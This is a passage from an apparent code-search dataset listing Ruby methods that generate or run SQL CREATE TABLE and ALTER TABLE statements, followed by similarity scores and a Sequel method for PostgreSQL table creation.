"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def create_table(table_name, options={})\n query = { }\n query['timeout'] = options[:timeout].to_s if options[:timeout]\n\n body = Table::Serialization.hash_to_entry_xml({\"TableName\" => table_name}).to_xml\n call(:post, collection_uri(query), body, {}, options)\n nil\n end",
"def create_migration_file\n return if skip_migration_creation?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def alter_table_sql(table, op)\n case op[:op]\n when :add_column\n \"ALTER TABLE #{quote_schema_table(table)} ADD #{column_definition_sql(op)}\"\n when :drop_column\n \"ALTER TABLE #{quote_schema_table(table)} DROP #{column_definition_sql(op)}\"\n when :rename_column\n \"ALTER TABLE #{quote_schema_table(table)} ALTER #{quote_identifier(op[:name])} TO #{quote_identifier(op[:new_name])}\"\n when :set_column_type\n \"ALTER TABLE #{quote_schema_table(table)} ALTER #{quote_identifier(op[:name])} TYPE #{type_literal(op)}\"\n else\n super(table, op)\n end\n end"
] |
[
"0.75814897",
"0.73549694",
"0.7348603",
"0.7305695",
"0.72647333",
"0.72407156",
"0.7212776",
"0.71801597",
"0.7177178",
"0.71413916",
"0.71264935",
"0.7111634",
"0.71094227",
"0.7092248",
"0.708161",
"0.7043943",
"0.70318645",
"0.69537044",
"0.6920031",
"0.6907666",
"0.6892962",
"0.68670744",
"0.67847776",
"0.66891116",
"0.6627652",
"0.66233706",
"0.65898216",
"0.65281415",
"0.65184313",
"0.65131235",
"0.64973325",
"0.6489502",
"0.6480767",
"0.6478118",
"0.64594126",
"0.64454144",
"0.64421093",
"0.64265186",
"0.6393143",
"0.63906664",
"0.6357786",
"0.6357272",
"0.63484555",
"0.6334175",
"0.63226825",
"0.63103324",
"0.63049245",
"0.6260207",
"0.6250404",
"0.62503237",
"0.6246205",
"0.62370443",
"0.6224804",
"0.622338",
"0.6215021",
"0.620762",
"0.6206132",
"0.6205145",
"0.6199986",
"0.61848706",
"0.6178895",
"0.6173954",
"0.6167549",
"0.61582685",
"0.60998774",
"0.6089966",
"0.6089056",
"0.6085457",
"0.6079365",
"0.606488",
"0.6048808",
"0.60461515",
"0.6031049",
"0.60287565",
"0.60266596",
"0.6013976",
"0.60014284",
"0.5994754",
"0.5992714",
"0.5991072",
"0.5989817",
"0.5986302",
"0.59787565",
"0.5975268",
"0.59727764",
"0.5970132",
"0.59498554",
"0.5940626",
"0.5939893",
"0.59376645",
"0.59359086",
"0.59151846",
"0.59091413",
"0.59003055",
"0.5896224",
"0.5885815",
"0.5883113",
"0.5878572",
"0.5872777",
"0.5872361"
] |
0.68803096
|
21
|
SQL for creating a table with PostgreSQL-specific options
|
def create_table_sql(name, generator, options)
"#{super}#{create_table_suffix_sql(name, options)}"
end
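
A minimal usage sketch (an editorial addition, not part of the dataset row): assuming the `sequel` gem with its PostgreSQL adapter, the suffix options that create_table_sql splices in can be passed directly to Database#create_table. The connection URL and the table names (audit, audit_2024, fast_disk) are illustrative.

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb')  # hypothetical connection URL

# Produces roughly:
#   CREATE TABLE "audit_2024" () INHERITS ("audit") TABLESPACE "fast_disk"
DB.create_table(:audit_2024, inherits: :audit, tablespace: :fast_disk) do
  # no new columns: everything is inherited from the parent "audit" table
end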
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def postgres_create_stager_table\n tbl = Rex::Text.rand_text_alpha(8).downcase\n fld = Rex::Text.rand_text_alpha(8).downcase\n resp = postgres_query(\"create temporary table #{tbl}(#{fld} text)\")\n if resp[:sql_error]\n print_error resp[:sql_error]\n return false\n end\n return [tbl,fld]\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def show_create_table(db, table)\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def create_table_from_generator(name, generator, options)\n execute_ddl(create_table_sql(name, generator, options))\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def createProjectTable\n @Handle.execute( @ProjectSchema ) \n end",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(structure_, data_={})\n Table.new(structure_, data_)\n end",
"def createUserTable(tableName)\n @conn.exec(\"DROP TABLE IF EXISTS #{tableName}\")\n @conn.exec(\"CREATE TABLE #{tableName} (id SERIAL PRIMARY KEY NOT NULL, course_id character varying(255) NOT NULL, name character varying(255), slug character varying(255), course_site character varying(255), instructors character varying(255000), partners character varying(255000), homepage character varying(255000), counter integer not null default 0, url_photo character varying(255000), summary character varying(255000)) WITH (OIDS=FALSE);\");\n end",
"def create_movies_table\n c = connect\n # this is another way to write a string, using %q{}\n c.exec %q{ \n CREATE TABLE movies (\n id SERIAL PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def make_table(options={})\n get_table(options).rows\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def migrate\n db.create_table? table_name do\n primary_key :id\n String :ptype\n String :v0\n String :v1\n String :v2\n String :v3\n String :v4\n String :v5\n end\n end",
"def generate_table_def_table()\r\n table_def_name = \"table_definitions\"\r\n\r\n # If the table doesn't already exist, create it\r\n puts \"Creating table definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :primary_key => true, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :formName, :size => db_column_size_limits[:formName]\r\n end\r\n end\r\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def get_schema_sql(table_struct, table_name = NEW_TABLE_NAME)\n dbstruct = []\n pkeys = []\n\n table_struct.each do | row |\n dbstruct << \"`#{row[:field]}` #{row[:type]} #{(!row[:default].nil? && row[:default] != '' ) ? \"default '#{row[:default]}'\" : ''} #{row[:null] == 'NO' ? 'NOT NULL' : ''}\"\n pkeys << \"`#{row[:field]}`\" if row[:key] == 'PRI'\n end \n\n dbstruct << \"PRIMARY KEY (%s)\" % [pkeys.join(', ')]\n dbstring = \"CREATE TABLE `%s` (\\n\\t%s\\n)\" % [table_name, dbstruct.join(\",\\n\\t\")]\n\n dbstring\nend",
"def create_user_table(database)\n\tcreate_user_table_cmd = <<-SQL \n\tCREATE TABLE IF NOT EXISTS users(\n\t\tid INTEGER PRIMARY KEY,\n\t\tname VARCHAR(255) UNIQUE\n\t)\nSQL\n\tdatabase.execute(create_user_table_cmd)\nend",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_tables!\n migrate(:up)\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def make_table(table, *args, others)\n unless others.is_a? Hash\n args << others\n others = {}\n end\n table = table.to_s # probably already was\n table_sym = table.to_sym\n @fields[table_sym] = args + others.keys\n @xform[table_sym] = {:inspect => [], :yaml => []}\n xform, fields = @xform, @fields # because of change in 'self'\n @db.create_table table_sym do\n primary_key table+\"_id\"\n args.each do |field| \n if field.to_s =~ /_id$/\n Integer field \n else\n String field\n end\n end\n others.each_pair do |field, klass|\n case klass.to_s.to_sym\n when :Integer; Integer field\n when :String; String field\n when :Float; Float field\n when :DateTime; DateTime field\n when :Array, :Hash, :Symbol\n String field\n xform[table_sym][:inspect] << field\n when :Yaml\n String field\n xform[table_sym][:yaml] << field\n end\n end\n end\n # Now save metadata...\n args_hash = {}\n args.each {|arg| args_hash.update(arg => :String) }\n args_hash.update(others)\n args_hash.each_pair {|k, v| args_hash[k] = v.to_s.to_sym }\n @db[:metadata].insert(:table => table, :transform => xform[table_sym].to_yaml, \n :fields => fields[table_sym].to_yaml)\n end",
